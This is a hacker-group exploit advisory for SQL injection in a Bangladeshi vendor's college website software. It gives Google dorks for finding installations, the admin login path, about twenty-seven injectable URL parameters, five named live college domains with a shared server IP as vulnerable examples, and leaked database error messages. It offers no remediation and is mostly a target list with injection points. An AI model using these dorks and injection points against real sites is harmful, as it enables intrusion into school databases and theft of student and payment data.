###################################################################
# Exploit Title : Powered By ITNext Bangladesh Solutions Limited SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : itnext.com.bd ~ edu-bd.org
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''This is Web-App Not Only A Website!!!
Powered By ITNext>>'' site:edu.bd
intext:''Powered By ITNext>>'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-itnext-bangladesh-solutions-limited-sql-injection.html
###################################################################
# Admin Panel Login Path :
*************************
/index.php?cat=quicklink&del=login
# SQL Injection Exploits :
***********************
/admission/index.php?cat=[SQL Injection]
/index.php?cat=quicklink&del=[SQL Injection]
/index.php?cat=Home&del=[SQL Injection]
/index.php?cat=Principal&del=[SQL Injection]
/index.php?cat=Vice%20Principal&del=[SQL Injection]
/index.php?cat=Teachers&del=[SQL Injection]
/index.php?cat=Students&del=[SQL Injection]
/index.php?cat=Brief%20History&del=[SQL Injection]
/index.php?cat=Tuition%20Fees&del=[SQL Injection]
/index.php?cat=Attendence&del=[SQL Injection]
/index.php?cat=List%20of%20Holiday&del=[SQL Injection]
/index.php?cat=Class%20Schedule&del=[SQL Injection]
/index.php?cat=Academic%20Calander&del=[SQL Injection]
/index.php?cat=Admission%20Fees&del=[SQL Injection]
/index.php?cat=Admission%20Open&del=[SQL Injection]
/index.php?cat=Laboratory&del=[SQL Injection]
/index.php?cat=Computer%20Lab&del=[SQL Injection]
/index.php?cat=College%20Library&del=[SQL Injection]
/index.php?cat=ACADEMIC&del=[SQL Injection]
/index.php?cat=ADMISSION&del=[SQL Injection]
/index.php?cat=Check%20Dues&del=[SQL Injection]
/index.php?cat=Online%20Payments&del=[SQL Injection]
/index.php?cat=News%20Corner&del=[SQL Injection]
/index.php?cat=Notice%20Board&del=[SQL Injection]
/index.php?cat=Photo%20Gallery&del=[SQL Injection]
/index.php?cat=Email%20Us&del=[SQL Injection]
/index.php?cat=Find%20Us&del=[SQL Injection]
###################################################################
# Example Vulnerable Sites =>
***************************
Note => (107.155.116.175) => There are 14 domains hosted on this server.
[+] mohsincollege.edu.bd/index.php?cat=quicklink&del=1%27
=> [ Proof of Concept for SQL Injection ] => archive.vn/xBSoT
[+] ramucollege.edu.bd/admission/index.php?cat=1'
[+] bakoliagovcollege.edu.bd/index.php?cat=quicklink&del=1%27
[+] pol-inst-cmp.edu.bd/index.php?cat=quicklink&del=1%27
[+] cgc.edu.bd/index.php?cat=quicklink&del=1%27
###################################################################
# SQL Database Error :
*********************
Warning: include(pages/1'.php): failed to open stream:
No such file or directory in /home/mcollege/public_html/index.php on line 426
Warning: include(): Failed opening 'pages/1'.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mcollege/public_html/index.php on line 426
Warning: mysql_connect(): Access denied for user 'root'@'localhost'
(using password: YES) in /home/ramucollege/public_html/admission/db_connect.php on line 22
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################